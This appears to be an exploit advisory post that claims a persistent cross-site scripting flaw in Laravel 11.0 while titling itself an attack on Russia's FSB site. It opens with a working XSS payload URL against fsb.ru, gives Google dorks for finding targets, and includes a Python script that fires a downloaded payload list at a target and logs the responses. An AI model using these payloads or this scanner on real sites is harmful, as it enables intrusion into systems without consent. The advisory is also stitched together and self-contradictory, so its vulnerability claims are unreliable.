 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E

  ### -- [ Contacts: ]

 [+] E-Mail: E1.Coders@Mail.Ru

 [+] GitHub: @e1coders

Russian FSB Cross Site Scripting

Laravel version 11.0 suffers from a cross site scripting vulnerability.

    /*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 - # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com/?q=- # GOOGLE DORK: Site:.com/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C- # CWE: CWE-79- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt*/  ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website. [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=  ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.  ### -- [ EXPLOIT : ]   import requests # Target URLurl = "https://TARGET.com/?q=" # Function to read payloads from a filedef read_payloads(filename="payloads.txt"):    try:        with open(filename, "r") as f:            payloads = [line.strip() for line in f]        return payloads    except FileNotFoundError:        print(f"Error: File '{filename}' not found.")        return [] # Function to perform the requestdef xss_attack(url, payload):    full_url = url + payload    try:        response = requests.get(full_url)        return response.status_code, response.text # return status code and response text    except requests.exceptions.RequestException as e:        print(f"An error occurred during the request: {e}")        return None, None # Main function to iterate over payloads and attackdef main():    payloads = read_payloads()    if not payloads:        return     results = []    for payload in payloads:        status_code, response_text = xss_attack(url, payload)        if status_code:          results.append({"payload": payload, "status_code": status_code, "response": response_text})     #Save results to a file (Example, you might need to adjust based on your desired output)    with open("attack_results.txt", "w") as f:        for result in results:            f.write(f"Payload: {result['payload']}\n")            f.write(f"Status Code: {result['status_code']}\n")            f.write(f"Response: {result['response']}\n\n") if __name__ == "__main__":    main()   ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Tag

#java